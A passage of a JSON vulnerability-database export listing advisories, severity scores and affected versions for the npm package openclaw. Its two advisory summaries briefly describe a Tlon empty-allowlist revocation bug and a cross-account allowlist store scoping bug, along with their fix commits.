CID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-x49q-fhhm-r9jf"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tkxh-m458-6ydw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90995?format=json","vulnerability_id":"VCID-tqzy-84fm-z7b6","summary":"OpenClaw: Tlon settings empty-allowlist reconciliation bypassed intended revocation\n## Summary\nTlon settings reconciliation treated explicit empty allowlists as unset, which could silently undo an intended deny-all revocation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `3cbf932413e41d1836cb91aed1541a28a3122f93`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/tlon/src/monitor/index.ts now honors explicit empty allowlists as authoritative deny-all configuration.\n- extensions/tlon/src/monitor/settings-helpers.test.ts ships regression coverage for explicit empty settings allowlists.\n\nThanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35649","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10166","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10155","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10185","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35649"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-pw7h-9g6p-c378","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-pw7h-9g6p-c378"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35649","reference_id":"CVE-2026-35649","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35649"},{"reference_url":"https://github.com/advisories/GHSA-pw7h-9g6p-c378","reference_id":"GHSA-pw7h-9g6p-c378","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pw7h-9g6p-c378"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-settings-reconciliation-bypass-via-empty-allowlist","reference_id":"openclaw-settings-reconciliation-bypass-via-empty-allowlist","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-settings-reconciliation-bypass-via-empty-allowlist"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35649","GHSA-pw7h-9g6p-c378"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tqzy-84fm-z7b6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50778?format=json","vulnerability_id":"VCID-tu4b-f885-eyds","summary":"OpenClaw: Cross-account sender authorization expansion in `/allowlist ... --store` account scoping\n`/allowlist ... --store` resolved the selected channel `accountId` for reads, but store writes still dropped that `accountId` and wrote into the legacy unscoped pairing allowlist store.\n\nBecause default-account reads still merge legacy unscoped entries, a store entry intended for one account could silently authorize the same sender on the `default` account.\n\nThis is a real cross-account sender-authorization scoping bug. Severity is set to **medium** because exploitation requires an already-authorized user who can run `/allowlist` edits.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/70da80bcb5574a10925469048d2ebb2abf882e73","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/70da80bcb5574a10925469048d2ebb2abf882e73"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-pjvx-rx66-r3fg","reference_id":"GHSA-pjvx-rx66-r3fg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pjvx-rx66-r3fg"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-pjvx-rx66-r3fg","reference_id":"GHSA-pjvx-rx66-r3fg","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-pjvx-rx66-r3fg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"